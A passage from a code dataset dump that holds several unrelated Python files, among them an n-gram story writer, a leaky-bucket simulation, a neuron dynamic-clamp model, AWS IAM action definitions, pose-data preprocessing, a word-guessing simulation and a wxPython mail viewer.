f.write(title + \": \" + str(year) + \", UNLEASHED\")\r\n f.write(\"\\n\")\r\n f.write(student_name + \", inspired by \" + author)\r\n f.write(\"\\n\")\r\n f.write(\"Copyright year published (\" + str(year) + \"), publisher: EngSci press\")\r\n f.write(\"\\n\")\r\n for lines in range(17):\r\n f.write(\"\\n\") \r\n \r\n line, word = \"\", \"\" # textual part of story\r\n charcount, pglines = 0,0\r\n chnum, pgnum = 1,1\r\n pgcount = 12\r\n N = len(text)\r\n for index in range(N): \r\n word += text[index] \r\n if word == \"of \" and pgnum == 12 and pglines == 22 and charcount > 30 and (text[index+1] == \"o\" or text[index+1] == \"O\") and text[index+3] == \"-\": \r\n # dealing with that one pesky test case, because modern problems require modern solutions\r\n word = word[0:len(word)-1]\r\n line += word\r\n f.write(line[0:len(line)] + \"\\n\")\r\n charcount = 0\r\n pglines += 1\r\n word = \"\"\r\n line = \"\"\r\n if pgcount == 12: # adding chapter numbers\r\n f.write(\"CHAPTER \" + str(chnum))\r\n f.write(\"\\n\")\r\n f.write(\"\\n\")\r\n pglines = 2\r\n pgcount = 0\r\n chnum += 1 \r\n if pglines == 28: # adding page numbers\r\n f.write(\"\\n\")\r\n f.write(str(pgnum))\r\n f.write(\"\\n\")\r\n pgnum += 1\r\n pgcount += 1\r\n pglines = 0\r\n if text[index] == \"\\n\" or text[index] == \" \" : # adding each word\r\n charcount += len(word)\r\n if charcount <= 91: # no new line needed\r\n line += word\r\n word = \"\"\r\n else: # new line protocol \r\n f.write(line[0:len(line)-1])\r\n f.write(\"\\n\") \r\n pglines += 1\r\n line = \"\"\r\n index -= len(word) \r\n charcount = 0\r\n # END SEQUENCE\r\n line += word\r\n f.write(line[0:len(line)] + \"\\n\") # last line\r\n pglines += 1\r\n while pglines < 28: # fill empty space to 30\r\n f.write(\"\\n\")\r\n pglines += 1\r\n f.write(\"\\n\" + str(pgnum))\r\n \r\n \r\nif __name__ == \"__main__\":\r\n words1 = [\"the\", \"child\", \"will\", \"go\", \"out\", \"to\", \"play\",\",\", \"and\", \"the\", \"child\", \"can\", \"not\", \"be\", \"sad\", \"anymore\", \".\"] \r\n ngram_counts = {}\r\n ngram_counts['i', 'love'] = [['js', 'py3', 'c'], [20, 20, 10]]\r\n ngram_counts[('u', 'r')] = [['cool', 'nice', 'lit', 'kind'], [7, 8, 5, 5]]\r\n ngram_counts[('toronto', 'is')] = [['six', 'drake', 'a', 'b'], [2, 3, 5, 4]] \r\n pruned = prune_ngram_counts(ngram_counts, 2)\r\n \r\n words = [\"the\", \"child\", \"will\", \"the\", \"child\", \"can\", \"the\", \"child\", \"will\", \"the\", \"child\", \"may\",\"go\", \"home\", \".\"] \r\n ngram_model = build_ngram_counts(words, 2)\r\n token_list = ['this', 'is', 'a', 'string', 'of', 'text', '.', 'which', 'needs', 'to', 'be', 'created', '.'] \r\n \r\n token_list = parse_story(\"308.txt\") \r\n text = \" \".join(parse_story(\"308.txt\"))\r\n write_story('test_gen_bot_text.txt', text, \"Three Men in a Boat\", \"Jerome K. Jerome\", \"Jerome K. Jerome\", 1889)\r\n f = open(\"analysis.txt\", \"w+\")\r\n f.write(text)\r\n print(build_ngram_model(words, 2))\r\n write_story('text1.txt', text, \"Three Men in a Boat\", \"Jerome K. Jerome\", \"Jerome K. Jerome\", 1889)\r\n \r\n \r\n","sub_path":"ngramwriter.py.py","file_name":"ngramwriter.py.py","file_ext":"py","file_size_in_byte":12509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"474349395","text":"from copy import deepcopy\nfrom collections import Counter\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nBLACK = 0\nWHITE = 1\nTRANSPARENT = 2\n\n\ndef get_checksum(data, w, h):\n layers = [data[i : i + w * h] for i in range(0, len(data), w * h)]\n min_layer = min(layers, key=lambda x: x.count(BLACK))\n return Counter(min_layer)[WHITE] * Counter(min_layer)[TRANSPARENT]\n\n\ndef get_image(data, w, h):\n layers = np.array(data).reshape(-1, h * w)\n non_trans_mask = (layers != TRANSPARENT).argmax(0)\n return layers[non_trans_mask, np.arange(w * h)].reshape(h, w)\n\n\ndef display_image(img):\n plt.imshow(img)\n plt.show()\n\n\nif __name__ == \"__main__\":\n with open(\"e8.txt\") as f:\n data = list(map(int, f.read().rstrip()))\n w = 25\n h = 6\n # 1\n print(get_checksum(data, w, h))\n # 2\n display_image(get_image(data, w, h))\n","sub_path":"day8/e8.py","file_name":"e8.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"131890765","text":"\r\n\r\nclass Client:\r\n def __init__(self, rate, data = []):\r\n self.rate = rate\r\n self.data = data\r\n\r\n def __str__(self):\r\n return str([str(self.rate), str(self.data)])\r\n\r\n\r\nclass Buffer:\r\n def __init__(self, bucket_size = int, bucket = []):\r\n self.bucket_size = bucket_size\r\n self.bucket = bucket\r\n\r\n def checkstate(self):\r\n if len(self.bucket) == 0:\r\n return True\r\n\r\n def __str__(self):\r\n return str([str(self.bucket_size), str(self.bucket)])\r\n\r\nbasestate = True\r\nsec = 1\r\nbuffer = Buffer(int(input(\"Enter bucket size\")))\r\nclient = Client(int(input(\"Enter client acceptance rate in bps\")))\r\nlost_data = []\r\ndata_to_send = str\r\n\r\nwhile basestate:\r\n data_to_send = input(\"Enter a string send by the server\")\r\n count = 0\r\n if buffer.checkstate():\r\n for i in range(0, len(data_to_send)):\r\n if i < client.rate:\r\n client.data.append(data_to_send[i])\r\n else:\r\n if count < buffer.bucket_size:\r\n buffer.bucket.append(data_to_send[i])\r\n count = len(buffer.bucket)\r\n else:\r\n lost_data.append(data_to_send[i])\r\n if lost_data:\r\n print(\"data Lost due to collision\")\r\n for i in lost_data:\r\n print(i, end=\"\")\r\n else:\r\n j=0\r\n for i in range(0, len(data_to_send)+len(buffer.bucket)):\r\n if i < client.rate:\r\n if len(buffer.bucket):\r\n client.data.append(buffer.bucket[0])\r\n del buffer.bucket[0]\r\n else:\r\n client.data.append(data_to_send[j])\r\n j += 1\r\n else:\r\n if len(buffer.bucket) <= buffer.bucket_size:\r\n if j < len(data_to_send):\r\n buffer.bucket.append(data_to_send[j])\r\n j += 1\r\n else:\r\n if j < len(data_to_send):\r\n j += 1\r\n lost_data.append(data_to_send[i])\r\n if lost_data:\r\n print(\"data Lost due to collision\")\r\n for i in lost_data:\r\n print(i, end=\"\")\r\n\r\n print(\"BUFFER SIZE: \"+str(buffer.bucket_size))\r\n if buffer.bucket:\r\n print(\"contents stored in the bucket\")\r\n for i in buffer.bucket:\r\n print(i, end=\"\")\r\n print(\" \")\r\n print(\"rate at which data is sent: \"+str(client.rate))\r\n if client.data:\r\n print(\"contents successfully sent :\")\r\n for i in client.data:\r\n print(i, end=\"\")\r\n print(\" \")\r\n\r\n","sub_path":"Cycle 2 -Lab 3/Leaky Bucket program.py","file_name":"Leaky Bucket program.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"629078055","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.linspace(0, 10, 50)\nsinus = np.sin(x)\ncosinus = np.cos(x)\nplt.plot(x, sinus, \"r-o\", label=\"sin(x)\")\nplt.plot(x, cosinus, \"g--\", label=\"cos(x)\")\nplt.legend(loc=2)\nplt.xlabel(\"Rads\")\nplt.ylabel(\"Amplitude\")\nplt.title(\"Sin and Cos Waves\")\nplt.show()\n\n","sub_path":"Ch10/Ch10_1_4b.py","file_name":"Ch10_1_4b.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"332025892","text":"# kc_ggn_feedback_dclamp.py --- \n# Author: Subhasis Ray\n# Created: Tue Aug 20 10:58:08 2019 (-0400)\n# Last-Updated: Wed Dec 11 17:32:49 2019 (-0500)\n# By: Subhasis Ray\n# Version: $Id$\n\n# Code:\n\"\"\"This script for testing expansion of the dynamic range of a KC due to GGN inhibition.\n\nInstead of running a whole simulation in the full network, we play the\nGGN membrane potential back to the KC.\n\nWe use GGN Vm from two simulations, one with low PN activity and\nanother with high PN activity.\n\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport sys\nsys.path += ['D:/subhasis_ggn/model/mb', 'D:/subhasis_ggn/model/mb/network', 'D:/subhasis_ggn/model/nrn']\nimport argparse\nimport numpy as np\nfrom collections import defaultdict\nimport matplotlib\nmatplotlib.use('Qt5Agg')\nfrom matplotlib import pyplot as plt\nimport h5py as h5\nfrom config import Q_, h, logger, timestamp, mypid, myjobid, nrn_version\nfrom timeit import default_timer as timer\nimport ephys\nimport nrnutils as nu\nimport neurograph as ng\nimport nsdf\n\n\nGGN_KC_SYN_PARAMS = {\n 'vmid': Q_('-40mV').to('mV').m,\n 'vslope': Q_('5.0mV').to('mV').m,\n 'e': Q_('-80mV').to('mV').m,\n 'gbar': Q_('1e-3uS').to('uS').m,\n 'tau': Q_('4.0ms').to('ms').m\n}\n\n# keep global reference of created model components so that they are\n# not garbage collected when out of scope\nmodel_dict = {}\n\ndef make_kc_with_dynaclamp(kc_name, kc_file, inject, tstart, tend, ggn_vm=None):\n \"\"\"Read KC model from `kc_file`, inject current `inject` nA, apply\n dynamic clamp `ggn_vm`, which should be a 2D array with time (ms)\n in column 0, and voltage (mV) in column 1.\n\n \"\"\"\n global model_dict\n kc = nu.create_cell(kc_name, filename=kc_file)\n model_dict[kc] = None\n iclamp = ephys.setup_current_clamp(kc.soma, pos=0.5, delay=Q_(tstart, 'ms'),\n duration=Q_((tend - tstart), 'ms'),\n amplitude=Q_(inject, 'nA'))\n model_dict[iclamp] = None\n ggn_g_vec = None\n if ggn_vm is not None:\n syn = h.GradedSyn(kc.soma(0.5))\n for attr, value in GGN_KC_SYN_PARAMS.items():\n setattr(syn, attr, value)\n model_dict[syn] = None\n ggn_comp = h.Section('ggn')\n model_dict[ggn_comp] = None\n h.setpointer(ggn_comp(0.5)._ref_v, 'vpre', syn)\n ggn_vm_vec = h.Vector(ggn_vm[:, 1])\n tvec = h.Vector(ggn_vm[:, 0])\n model_dict[tvec] = None\n # vec.play(var_reference, t, continuous) for interpolating \n ret = ggn_vm_vec.play(ggn_comp(0.5)._ref_v, tvec, 1)\n print('####', ret)\n model_dict[ggn_vm_vec] = None\n ggn_g_vec = h.Vector()\n ggn_g_vec.record(syn._ref_g)\n model_dict[ggn_g_vec] = None\n kc_vm_vec = h.Vector()\n kc_vm_vec.record(kc.soma(0.5)._ref_v)\n model_dict[kc_vm_vec] = None\n print('Built model')\n return (kc_vm_vec, ggn_g_vec)\n\ndef make_parser():\n parser = argparse.ArgumentParser(description='Simulate KC with GGN inhibition at multiple current injections')\n parser.add_argument('--kc-file', type=str, dest='kc_file',\n required=True, help='KC cell template file'\n ' (.hoc)')\n parser.add_argument('--kc', type=str, dest='kc', required=True,\n help='KC cell template name in template file')\n parser.add_argument('--ggn-vm-file', type=str, action='append', dest='ggn_vm_file',\n required=True,\n help='CSV file with column 0 time in ms, column 1 GGN Vm in mV')\n parser.add_argument('--istart', type=str, dest='istart', help='Starting amplitude of current (with unit)')\n parser.add_argument('--iend', type=str, dest='iend', help='Ending amplitude of current (with unit)')\n parser.add_argument('--di', type=str, dest='di', help='Current increments (with unit)')\n parser.add_argument('--tstart', type=str, dest='tstart', help='Current injection start time (with unit)')\n parser.add_argument('--tend', type=str, dest='tend', help='Current injection end time (with unit)') \n return parser\n\n\ndef main():\n parser = make_parser()\n args = parser.parse_args()\n logger.info('Command line args: {}'.format(str(sys.argv)))\n print(args.ggn_vm_file)\n # KCs with GGN inhibition\n inhibited_vec = defaultdict(list)\n solo_vec_list = []\n tstart = Q_(args.tstart).to('ms').m\n tend = Q_(args.tend).to('ms').m\n istart = Q_(args.istart).to('nA').m\n iend = Q_(args.iend).to('nA').m\n di = Q_(args.di).to('nA').m\n irange = np.arange(istart, iend + di/2.0, di)\n logger.info('Starting current: {} nA'.format(istart))\n logger.info('End current: {} nA'.format(iend))\n logger.info('Increment: {} nA'.format(di))\n logger.info('current range: {}'.format(irange))\n ggn_vm = {}\n for input_file in args.ggn_vm_file:\n ggn_vm[input_file] = np.loadtxt(input_file)\n for inject in irange:\n for input_file, vm in ggn_vm.items():\n kc_vvec, ggn_gvec = make_kc_with_dynaclamp(args.kc, args.kc_file, inject, tstart, tend, vm)\n inhibited_vec[input_file].append((kc_vvec, ggn_gvec))\n # KC without any inhibition\n kc_vvec, ggn_gvec = make_kc_with_dynaclamp(args.kc, args.kc_file, inject, tstart, tend)\n solo_vec_list.append(kc_vvec)\n tvec = h.Vector()\n tvec.record(h._ref_t)\n h.tstop = tend\n print('Init') \n h.init()\n print('Run')\n h.run()\n print('Finished simulation')\n fig, ax = plt.subplots(nrows=len(irange)+1, ncols=len(ggn_vm)+1, sharex='all', sharey='all')\n t = np.array(tvec.x)\n solo_data = []\n for ii, vvec in enumerate(solo_vec_list):\n ax[ii+1, 0].plot(tvec, vvec, color='#e66101')\n solo_data.append(np.array(vvec.x))\n combined = np.vstack(solo_data)\n \n prefix = 'UTC' + timestamp.strftime('%Y%m%d_%H%M%S')\n fname = '{}_solo_kc.npz'.format(prefix)\n np.savez(fname,\n t=t,\n vm=combined,\n inject=irange)\n logger.info('Saved solo KC data in {}'.format(fname))\n for jj, input_file in enumerate(args.ggn_vm_file):\n fname = '{}_{}.npz'.format(prefix, os.path.basename(input_file))\n data = []\n kc_vm_list = inhibited_vec[input_file]\n for ii, (vvec, gvec) in enumerate(kc_vm_list):\n data.append(np.array(vvec.x))\n ax[ii+1, jj+1].plot(tvec, vvec, color='#e66101')\n ax[ii+1, 0].set_ylabel('{} pA'.format(irange[ii]*1e3))\n # ax[ii+1, 0].set_ylabel('{} pA'.format(int(np.round(irange[ii]*1e3)))) # to avoid decimal point when integer values \n # ax[0, jj+1].plot(tvec, gvec)\n # ax[0, jj+1].plot(ggn_vm[input_file][:,0], ggn_vm[input_file][:,1])\n ax[0, jj+1].set_title(input_file)\n combined = np.vstack(data)\n np.savez(fname, combined=combined, irange=irange, ggn_vm=ggn_vm[input_file])\n logger.info('Saved data from dynamic clamp with input from {} in {}'.format(\n input_file, fname))\n for axis in ax.flat:\n axis.set_xlim(250, 1750)\n fig.set_size_inches(210/25.4, 290/25.4)\n fig.tight_layout()\n fig.savefig('{}_KC_dynamic_range_with_ggn_vm.svg'.format(prefix))\n plt.show()\n print('End')\n\n \nif __name__ == '__main__':\n main()\n \n\n# \n# kc_ggn_feedback_dclamp.py ends here\n","sub_path":"mb/network/kc_ggn_feedback_dclamp.py","file_name":"kc_ggn_feedback_dclamp.py","file_ext":"py","file_size_in_byte":7330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"48009074","text":"# Copyright (c) 2012-2013, Mark Peek \n# All rights reserved.\n#\n# See LICENSE file for full license.\n\nfrom aws import Action as BaseAction\nfrom aws import BaseARN\n\nservice_name = 'AWS Well-Architected Tool'\nprefix = 'wellarchitected'\n\n\nclass Action(BaseAction):\n def __init__(self, action=None):\n sup = super(Action, self)\n sup.__init__(prefix, action)\n\n\nclass ARN(BaseARN):\n def __init__(self, resource='', region='', account=''):\n sup = super(ARN, self)\n sup.__init__(service=prefix, resource=resource, region=region,\n account=account)\n\n\nAssociateLenses = Action('AssociateLenses')\nCreateMilestone = Action('CreateMilestone')\nCreateWorkload = Action('CreateWorkload')\nCreateWorkloadShare = Action('CreateWorkloadShare')\nDeleteWorkload = Action('DeleteWorkload')\nDeleteWorkloadShare = Action('DeleteWorkloadShare')\nDisassociateLenses = Action('DisassociateLenses')\nGetAnswer = Action('GetAnswer')\nGetLensReview = Action('GetLensReview')\nGetLensReviewReport = Action('GetLensReviewReport')\nGetLensVersionDifference = Action('GetLensVersionDifference')\nGetMilestone = Action('GetMilestone')\nGetWorkload = Action('GetWorkload')\nListAnswers = Action('ListAnswers')\nListLensReviewImprovements = Action('ListLensReviewImprovements')\nListLensReviews = Action('ListLensReviews')\nListLenses = Action('ListLenses')\nListMilestones = Action('ListMilestones')\nListNotifications = Action('ListNotifications')\nListShareInvitations = Action('ListShareInvitations')\nListWorkloadShares = Action('ListWorkloadShares')\nListWorkloads = Action('ListWorkloads')\nUpdateAnswer = Action('UpdateAnswer')\nUpdateLensReview = Action('UpdateLensReview')\nUpdateShareInvitation = Action('UpdateShareInvitation')\nUpdateWorkload = Action('UpdateWorkload')\nUpdateWorkloadShare = Action('UpdateWorkloadShare')\nUpgradeLensReview = Action('UpgradeLensReview')\n","sub_path":"awacs/wellarchitected.py","file_name":"wellarchitected.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"234066032","text":"import numpy as np\r\nimport math\r\nimport cv2\r\nimport os\r\ndef convert_xy(axis_x,axis_y):\r\n # 将二维矩阵线性变换到0-255之间\r\n min_x=np.min(axis_x)\r\n min_y=np.min(axis_y)\r\n axis_x-=min_x\r\n axis_y-=min_y\r\n max_x = np.max(axis_x)\r\n max_y = np.max(axis_y)\r\n axis_x*=255/max_x\r\n axis_y*=255/max_y\r\n return axis_x,axis_y\r\ndef relative_pos(x0,y0,x,y):\r\n # 将二维笛卡尔坐标转化为二维极坐标\r\n distance=np.sqrt((x0-x)**2+(y0-y)**2)\r\n angle=math.atan2(y-y0,x-x0)\r\n return distance,angle\r\n\r\ndef copy_data(cir_coord):\r\n #将128*16的矩阵统一resize到224*224大小,方便CNN网络处理\r\n t=cir_coord.shape[2]\r\n batch=cir_coord.shape[0]\r\n true_coord=np.zeros((cir_coord.shape[0],cir_coord.shape[1],224,224,cir_coord.shape[4]))\r\n for b in range(batch):\r\n for i in range(cir_coord.shape[1]):\r\n for j in range(cir_coord.shape[4]):\r\n map=np.tile(cir_coord[b,i,:,:,j],14)\r\n map1=np.zeros((224,224))\r\n if t>224:\r\n map1=np.resize(cir_coord[b,i,:,:,j],(224,224))\r\n else:\r\n p = np.zeros((224,16))\r\n mod=224%t\r\n div=224//t\r\n for q in range(div):\r\n p[q*t:(q+1)*t,:]=cir_coord[b,i,:,:,j]\r\n p[div*t:div*t+mod,:]=cir_coord[b,i,:,:,j][:mod,:]\r\n map1=np.resize(p,(224,224))\r\n true_coord[b,i,:,:,j]=map1\r\n return true_coord\r\n\r\n\r\ndef pre_treat_train(path):\r\n #对训练集原始数据进行预处理\r\n data=np.load(path)\r\n t = data.shape[2]\r\n batch=data.shape[0]\r\n cir_coord = np.zeros((batch,4, t, 16, 2))#4为四个关键点,t为帧数,16为剩下的关节,2为两个圆坐标\r\n for b in range(batch):\r\n imcoords=[5,6,11,12]#四个关键点5,6,11,12\r\n for n,imcoord in enumerate(imcoords):\r\n for i in range(t):\r\n data[b, 0, i, :, :][imcoord][0] += np.random.randint(-3, 3)\r\n data[b, 2, i, :, :][imcoord][0] += np.random.randint(-3, 3)#引入随机噪声\r\n for coord_num in range(17):\r\n if coord_numimcoord:\r\n data[b, 0, i, :, :][coord_num][0] += np.random.randint(-3, 3)\r\n data[b, 2, i, :, :][coord_num][0] += np.random.randint(-3, 3)\r\n distance, angle = relative_pos(data[b, 0, i, :, :][imcoord][0], data[b, 2, i, :, :][imcoord][0],\r\n data[b, 0, i, :, :][coord_num][0],\r\n data[b, 2, i, :, :][coord_num][0])\r\n cir_coord[b,n, i,coord_num-1,0],cir_coord[b,n, i,coord_num-1,1]=distance,angle\r\n cir_coord[b,n,:,:,0],cir_coord[b,n,:,:,1]=convert_xy(cir_coord[b,n,:,:,0],cir_coord[b,n,:,:,1])\r\n for b in range(batch):\r\n for n in range(4):\r\n cir_coord[b, n, :, :, 0] /= 255\r\n cir_coord[b, n, :, :, 1] /= 255\r\n #对即将进入CNN的矩阵进行归一化操作\r\n cir_coord = copy_data(cir_coord)\r\n return cir_coord\r\n\r\ndef pre_treat_test(path):\r\n #对测试集原始数据进行预处理\r\n data = np.load(path)\r\n t = data.shape[2]\r\n batch = data.shape[0]\r\n cir_coord = np.zeros((batch, 4, t, 16, 2)) # 4为四个关键点,t为帧数,16为剩下的关节,2为两个圆坐标\r\n for b in range(batch):\r\n imcoords = [5, 6, 11, 12] # 四个关键点5,6,11,12\r\n for n, imcoord in enumerate(imcoords):\r\n\r\n for i in range(t):\r\n for coord_num in range(17):\r\n if coord_num < imcoord:\r\n a = data[b, 2, i, :, 0]\r\n distance, angle = relative_pos(data[b, 0, i, :, :][imcoord][0],\r\n data[b, 2, i, :, :][imcoord][0] + np.random.randint(-3, 3),\r\n data[b, 0, i, :, :][coord_num][0],\r\n data[b, 2, i, :, :][coord_num][0])\r\n cir_coord[b, n, i, coord_num, 0], cir_coord[b, n, i, coord_num, 1] = distance, angle\r\n elif coord_num > imcoord:\r\n distance, angle = relative_pos(data[b, 0, i, :, :][imcoord][0],\r\n data[b, 2, i, :, :][imcoord][0],\r\n data[b, 0, i, :, :][coord_num][0],\r\n data[b, 2, i, :, :][coord_num][0])\r\n cir_coord[b, n, i, coord_num - 1, 0], cir_coord[b, n, i, coord_num - 1, 1] = distance, angle\r\n cir_coord[b, n, :, :, 0], cir_coord[b, n, :, :, 1] = convert_xy(cir_coord[b, n, :, :, 0],\r\n cir_coord[b, n, :, :, 1])\r\n for b in range(batch):\r\n for n in range(4):\r\n cir_coord[b, n, :, :, 0]/=255\r\n cir_coord[b, n, :, :, 1]/=255\r\n cir_coord=copy_data(cir_coord)\r\n return cir_coord\r\n\r\nif __name__ == '__main__':\r\n sample_path = './data/train/000/P000S00G10B10H50UC022000LC021000A000R0_08251609.npy'\r\n sample = pre_treat(sample_path)","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"177485853","text":"import random\r\nimport csv\r\n\r\nreps = int(raw_input(\"How many repetitions do you want to do? : \"))\r\n\r\nfo = open('GuessesAndWords650.csv','a')\r\n\r\nfor y in range(reps):\r\n\tall_words = []\r\n\tmaster_list = []\r\n\r\n\twith open('FourLetterUse.csv', 'r') as csvfile:\r\n\t\treader = csv.reader(csvfile)\r\n\t\tfor row in reader:\r\n\t\t\tall_words.append(row)\r\n\t\t\tmaster_list.append(row)\r\n\t\tall_words.pop(0)\r\n\t\tmaster_list.pop(0)\r\n\r\n\tmy_word = \"\".join(all_words[random.randrange(len(all_words))])\r\n\tletters = list(my_word)\r\n\r\n\tnum_guesses = 0\r\n\twhile True:\r\n\t\tnum_guesses += 1\r\n\t\t\"\"\"\r\n\t\tif num_guesses < 3:\r\n\t\t\tindex = random.randrange(len(master_list))\r\n\t\t\tcpuGuess = \"\".join(master_list[index])\r\n\t\t\tguess_letters = list(cpuGuess)\r\n\t\t\"\"\"\r\n\t\tif len(all_words) > 650:\r\n\t\t\tindex = random.randrange(len(master_list))\r\n\t\t\tcpuGuess = \"\".join(master_list[index])\r\n\t\t\tguess_letters = list(cpuGuess)\r\n\t\t\r\n\t\telse:\r\n\t\t\tindex = random.randrange(len(all_words))\r\n\t\t\tcpuGuess = \"\".join(all_words[index])\r\n\t\t\tguess_letters = list(cpuGuess)\r\n\t\t\tall_words.pop(index)\r\n\r\n\t\tif cpuGuess == my_word:\r\n\t\t\tbreak\r\n\t\t\r\n\t\tlets = 0\r\n\t\tfor l in guess_letters:\r\n\t\t\tif l in letters:\r\n\t\t\t\tlets += 1\r\n\r\n\t\tif lets == 0:\r\n\t\t\tx = 0\r\n\t\t\twhile x < len(all_words):\r\n\t\t\t\tl = list(str(all_words[x]))\r\n\t\t\t\tin_ = False\r\n\t\t\t\tfor char in guess_letters:\r\n\t\t\t\t\tif char in l:\r\n\t\t\t\t\t\tin_ = True\r\n\t\t\t\tif in_ == True:\r\n\t\t\t\t\tall_words.pop(x)\r\n\t\t\t\telse:\r\n\t\t\t\t\tx += 1\r\n\r\n\t\telse:\r\n\t\t\tx = 0\r\n\t\t\twhile x < len(all_words):\r\n\t\t\t\tl = list(str(all_words[x]))\r\n\t\t\t\tin_ = 0\r\n\t\t\t\tfor char in guess_letters:\r\n\t\t\t\t\tif char in l:\r\n\t\t\t\t\t\tin_ += 1\r\n\t\t\t\tif in_ < lets:\r\n\t\t\t\t\tall_words.pop(x)\r\n\t\t\t\telif in_ > lets:\r\n\t\t\t\t\tall_words.pop(x)\r\n\t\t\t\telse:\r\n\t\t\t\t\tx += 1\r\n\t\"\"\"\r\n\tprint \"It took \" + str(num_guesses) + \" guesses. The word was \" + my_word\r\n\t\"\"\"\r\n\tfo.write(str(num_guesses) + \",\" + my_word + \"\\n\")\r\n\r\nfo.close()\r\n","sub_path":"4LetterWordGame/simulation_game2.py","file_name":"simulation_game2.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"457134865","text":"# coding: utf-8\r\nimport os, sys\r\nrundir = os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0]))).replace(\"\\\\\", \"/\")\r\nsys.path.insert(0, os.path.join(rundir, 'base'))\r\nimport wx\r\nimport logfile, config\r\nfrom logfile import loginfo, logwarn, logerr\r\nimport viewhtml, mailparse\r\nfrom common import load_bitmap, load_image\r\nfrom picmenu import PicMenu\r\n\r\nclass MailViewFrame(wx.Frame):\r\n def __init__(self, parent, rundir, user, mailfile):\r\n self.rundir = rundir \r\n self.bmpdir = self.rundir + \"/bitmaps\"\r\n self.mailfile = mailfile\r\n self.user = user\r\n \r\n wx.Frame.__init__(self, parent, title=u'查看邮件', size=(800,600))\r\n self.parent = parent\r\n \r\n self.make_menu()\r\n self.make_toolbar()\r\n self.make_viewer(mailfile)\r\n self.make_statusbar()\r\n \r\n def make_menu(self):\r\n self.ID_MENU_EXIT = wx.NewId()\r\n self.ID_MENU_SOURCE = wx.NewId()\r\n self.ID_MENU_REPLY = wx.NewId()\r\n self.ID_MENU_FORWARD = wx.NewId()\r\n \r\n self.menubar = wx.MenuBar()\r\n \r\n self.filemenu = PicMenu(self)\r\n self.filemenu.Append(self.ID_MENU_EXIT, u'退出', 'exit.png')\r\n self.menubar.Append(self.filemenu, u'文件')\r\n \r\n self.viewmenu = PicMenu(self)\r\n self.viewmenu.Append(self.ID_MENU_SOURCE, u'邮件原文', 'contents.png')\r\n self.menubar.Append(self.viewmenu, u'查看')\r\n \r\n self.mailmenu = PicMenu(self)\r\n self.mailmenu.Append(self.ID_MENU_REPLY, u'回复', 'mail_reply.png')\r\n self.mailmenu.Append(self.ID_MENU_FORWARD, u'转发', 'mail_send.png')\r\n self.menubar.Append(self.mailmenu, u'邮件')\r\n \r\n self.SetMenuBar(self.menubar)\r\n \r\n self.Bind(wx.EVT_MENU, self.OnFileExit, id=self.ID_MENU_EXIT)\r\n self.Bind(wx.EVT_MENU, self.OnViewSource, id=self.ID_MENU_SOURCE)\r\n self.Bind(wx.EVT_MENU, self.OnMailReply, id=self.ID_MENU_REPLY)\r\n self.Bind(wx.EVT_MENU, self.OnMailForward, id=self.ID_MENU_FORWARD)\r\n \r\n def make_toolbar(self):\r\n self.ID_TOOLBAR_REPLY = wx.NewId()\r\n self.ID_TOOLBAR_FORWARD = wx.NewId()\r\n \r\n self.toolbar = wx.ToolBar(self, -1, wx.DefaultPosition, wx.Size(48, 48), style=wx.TB_HORIZONTAL|wx.TB_FLAT|wx.TB_TEXT)\r\n self.toolbar.SetToolBitmapSize(wx.Size(48,48))\r\n \r\n self.toolbar.AddLabelTool(self.ID_TOOLBAR_REPLY, u'回复', load_bitmap(self.bmpdir+'/32/mail_reply.png'), shortHelp=u'回复邮件', longHelp=u'回复邮件')\r\n self.toolbar.AddLabelTool(self.ID_TOOLBAR_FORWARD, u'转发', load_bitmap(self.bmpdir+'/32/mail_forward.png'), shortHelp=u'转发邮件', longHelp=u'转发邮件')\r\n \r\n self.toolbar.Realize()\r\n self.SetToolBar(self.toolbar)\r\n self.Bind(wx.EVT_TOOL, self.OnMailReply, id=self.ID_TOOLBAR_REPLY) \r\n self.Bind(wx.EVT_TOOL, self.OnMailForward, id=self.ID_TOOLBAR_FORWARD) \r\n \r\n \r\n def make_statusbar(self):\r\n self.statusbar = self.CreateStatusBar()\r\n self.statusbar.SetFieldsCount(2)\r\n self.SetStatusWidths([-1, -2])\r\n \r\n def make_viewer(self, mailfile):\r\n ret = mailparse.decode_mail(mailfile)\r\n #panel = wx.Panel(self)\r\n sizer = wx.BoxSizer(wx.VERTICAL)\r\n self.viewer = viewhtml.ViewHtml(self)\r\n self.viewer.set_text_auto(ret['html'], ret['plain'])\r\n sizer.Add(self.viewer, flag=wx.ALL|wx.EXPAND, border=0, proportion=1)\r\n \r\n if ret['attach']:\r\n self.attachctl = viewhtml.AttachListCtrl(self, self.rundir, wx.Size(-1,100))\r\n sizer.Add(self.attachctl, flag=wx.ALL|wx.EXPAND, border=0, proportion=0)\r\n homepath = os.path.join(config.cf.datadir, self.user)\r\n for item in ret['attach']:\r\n self.attachctl.add_file(item[0], {'home':homepath, 'file':mailfile, 'attach':item[0]})\r\n \r\n self.SetSizer(sizer)\r\n \r\n def OnFileExit(self, evt):\r\n self.Destroy()\r\n \r\n def OnViewSource(self, evt):\r\n pass\r\n \r\n def OnMailReply(self, evt):\r\n pass\r\n \r\n def OnMailForward(self, evt):\r\n pass\r\n \r\nclass TestApp(wx.App):\r\n def __init__(self):\r\n wx.App.__init__(self, redirect=False)\r\n\r\n def OnInit(self):\r\n rundir = os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0]))).replace(\"\\\\\", 